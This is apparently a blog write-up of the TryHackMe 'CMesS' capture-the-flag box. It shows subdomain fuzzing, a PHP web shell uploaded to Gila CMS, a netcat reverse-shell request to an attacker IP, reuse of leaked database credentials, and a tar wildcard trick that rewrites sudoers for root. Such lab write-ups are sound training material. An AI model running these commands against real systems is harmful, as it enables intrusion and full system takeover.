---
layout: post
title:  "THM - CMesS"
date:   2020-07-31 18:00:00 +1000
category: hacking
---

## Introduction
*Can you root this Gila CMS box?*  

This is a medium rated box, and we already know it runs Gila CMS from the title. Let's begin.

## Ports
nmap says we've got 22 (SSH) and 80 (HTTP) only; web all the way? 

## Webserver
Checking searchsploit before doing much else, we can see there a couple of different authenticated RCE exploits for different versions of Gila, so presumably we're going to need some creds. 

We can do some gobusting/dirbusting and turn up plenty of links, but nothing very fruitful. Checking the Gila documentation doesn't help much either.

## Subdomains
We can use WFUZZ to fuzz for subdomains, so let's do that:

``
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" -t 42 --hl 1
``

Note: this command is NOT optimised - it didn't filter out bad results. But quickly scanning through it revealed one good result - dev.cmess.thm.

We add dev.cmess.thm to our /etc/hosts and continue

## dev.cmess.thm
This is a simple page that exists (essentially) purely for the purpose of giving us credentials. Yes, these CTFs are somewhat contrived.

**andre@cmess.thm:KPFTN_f2yxe%**

## In Gila
Once we log in and poke around for a bit, we find we can upload a file. I do **shell.phtml** with the contents:

{% highlight php %}
<?php system($_GET['cmd']);?>
{% endhighlight %}

Once we've got that we can send it a reverse shell command with Burp Suite:

``
GET /tmp/media_thumb/shell.phtml?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.9.10.123+1234+>/tmp/f HTTP/1.1
``

## On the box
We grabbed the credentials for the SQL login earlier when we were poking around in Gila: **root:r0otus3rpassw0rd**.

We can login to SQL:

{% highlight shell %}
www-data@cmess:/$ mysql --host=127.0.0.1 --port 3306 -u root -p  
Enter password: r0otus3rpassw0rd
etc.
mysql> select * from user;
{% endhighlight %}

And with that we grab andre's hash:  
*$2y$10$uNAA0MEze02jd.qU9tnYLu43bNo9nujltElcWEAcifNeZdk4bEsBa*


But to make it even easier we can find the password (*UQfsdCB7aAP6*) for andre in **/opt/.password.bak** and then we can **su andre**. 

## Andre
Linpeas points to a cronjob:

``
root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
``

This was a new one to me. At first I thought I could replace tar, but cron has it's own PATH:

``
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
``

And I can't write to any of these directories. So now what? Well, there are a class of **tar** exploits that I wasn't previously aware of. This [site](https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/) provides an explanation and examples. Here's what I did:

{% highlight shell %}
andre@cmess:/home/andre/backup$ echo 'echo "andre ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > test.sh
andre@cmess:/home/andre/backup$ echo "" > "--checkpoint-action=exec=sh test.sh"                      
andre@cmess:/home/andre/backup$ echo "" > --checkpoint=1                                             
andre@cmess:/home/andre/backup$ tar cf archive.tar *
test.sh: 1: test.sh: cannot create /etc/sudoers: Permission denied

andre@cmess:/home/andre/backup$ sudo -l
User andre may run the following commands on cmess:
    (root) NOPASSWD: ALL
andre@cmess:/home/andre/backup$ sudo /bin/bash
root@cmess:/home/andre/backup# cat /root/root.txt
thm{9f85b7fdeb2cf96985bf5761a93546a2}
{% endhighlight %}

To be honest, I don't really understand why this works, but it does. More things to learn.

